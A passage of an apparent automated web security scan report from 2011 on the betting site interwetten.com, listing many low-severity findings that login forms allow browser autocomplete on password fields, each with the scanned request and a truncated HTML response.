13.127. https://www.interwetten.com/Header-Help-FAQ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/Header-Help-FAQ

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/Header-Help-FAQ?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Help-FAQ

The form contains the following password field with autocomplete enabled:

wucHeader$ucLogin$txtPassword

Request

GET /Header-Help-FAQ HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:43:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:43:58 GMT
Connection: close
Content-Length: 48223
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="Header-Help-FAQ?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Help-FAQ" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.128. https://www.interwetten.com/Header-Menu-Casino previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/Header-Menu-Casino

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/Header-Menu-Casino?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Menu-Casino

The form contains the following password field with autocomplete enabled:

wucHeader$ucLogin$txtPassword

Request

GET /Header-Menu-Casino HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:44:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:44:29 GMT
Connection: close
Content-Length: 49628
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="Header-Menu-Casino?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Menu-Casino" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.129. https://www.interwetten.com/Header-Menu-Home previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/Header-Menu-Home

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/Header-Menu-Home?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Menu-Home

The form contains the following password field with autocomplete enabled:

wucHeader$ucLogin$txtPassword

Request

GET /Header-Menu-Home HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:44:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:44:03 GMT
Connection: close
Content-Length: 48244
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="Header-Menu-Home?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Menu-Home" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.130. https://www.interwetten.com/Header-Menu-Live previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/Header-Menu-Live

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/Header-Menu-Live?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Menu-Live

The form contains the following password field with autocomplete enabled:

wucHeader$ucLogin$txtPassword

Request

GET /Header-Menu-Live HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:44:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:44:11 GMT
Connection: close
Content-Length: 48264
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="Header-Menu-Live?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Menu-Live" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.131. https://www.interwetten.com/Header-Menu-Sportsbook previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/Header-Menu-Sportsbook

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/Header-Menu-Sportsbook?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Menu-Sportsbook

The form contains the following password field with autocomplete enabled:

wucHeader$ucLogin$txtPassword

Request

GET /Header-Menu-Sportsbook HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:44:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:44:05 GMT
Connection: close
Content-Length: 47743
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="Header-Menu-Sportsbook?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Menu-Sportsbook" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.132. https://www.interwetten.com/Header-Payment-possibilities previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/Header-Payment-possibilities

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/Header-Payment-possibilities?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Payment-possibilities

The form contains the following password field with autocomplete enabled:

wucHeader$ucLogin$txtPassword

Request

GET /Header-Payment-possibilities HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:43:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:43:59 GMT
Connection: close
Content-Length: 47869
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="Header-Payment-possibilities?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Payment-possibilities" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.133. https://www.interwetten.com/Header-Tutorials previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/Header-Tutorials

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/Header-Tutorials?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Tutorials

The form contains the following password field with autocomplete enabled:

wucHeader$ucLogin$txtPassword

Request

GET /Header-Tutorials HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:43:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:43:56 GMT
Connection: close
Content-Length: 49586
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="Header-Tutorials?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Tutorials" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.134. https://www.interwetten.com/ScriptResource.axd previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/ScriptResource.axd

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/ScriptResource.axd

The form contains the following password field with autocomplete enabled:

wucHeader$ucLogin$txtPassword

Request

GET /ScriptResource.axd HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:57 GMT
Connection: close
Content-Length: 48393
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="ScriptResource.axd" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.135. https://www.interwetten.com/WebResource.axd previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/WebResource.axd

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/WebResource.axd

The form contains the following password field with autocomplete enabled:

wucHeader$ucLogin$txtPassword

Request

GET /WebResource.axd HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:53 GMT
Connection: close
Content-Length: 48387
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="WebResource.axd" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.136. https://www.interwetten.com/en/Default.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/Default.aspx

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/Default.aspx

The form contains the following password field with autocomplete enabled:

wucHeader$ucLogin$txtPassword

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=hb2ctrm1vmsjvqy123bfn1ln; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=hb2ctrm1vmsjvqy123bfn1ln; path=/; HttpOnly
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 11:44:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:44:27 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 33754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<hea
...[SNIP]...

<form method="post" action="Default.aspx" id="form">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.137. https://www.interwetten.com/en/american-football-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/american-football-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/american-football-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/american-football-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:09 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:09 GMT
Connection: close
Content-Length: 223280
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/american-football-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.138. https://www.interwetten.com/en/australian-rules-football-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/australian-rules-football-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/australian-rules-football-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/australian-rules-football-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:32 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:32 GMT
Connection: close
Content-Length: 223367
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/australian-rules-football-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.139. https://www.interwetten.com/en/beach-soccer-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/beach-soccer-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/beach-soccer-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/beach-soccer-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:21 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:21 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:21 GMT
Connection: close
Content-Length: 221952
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/beach-soccer-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.140. https://www.interwetten.com/en/boxing-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/boxing-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/boxing-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/boxing-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:12 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:12 GMT
Connection: close
Content-Length: 223215
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/boxing-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.141. https://www.interwetten.com/en/casino/default.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/casino/default.aspx

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/casino/default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/casino/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

13.142. https://www.interwetten.com/en/cycling-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/cycling-betting

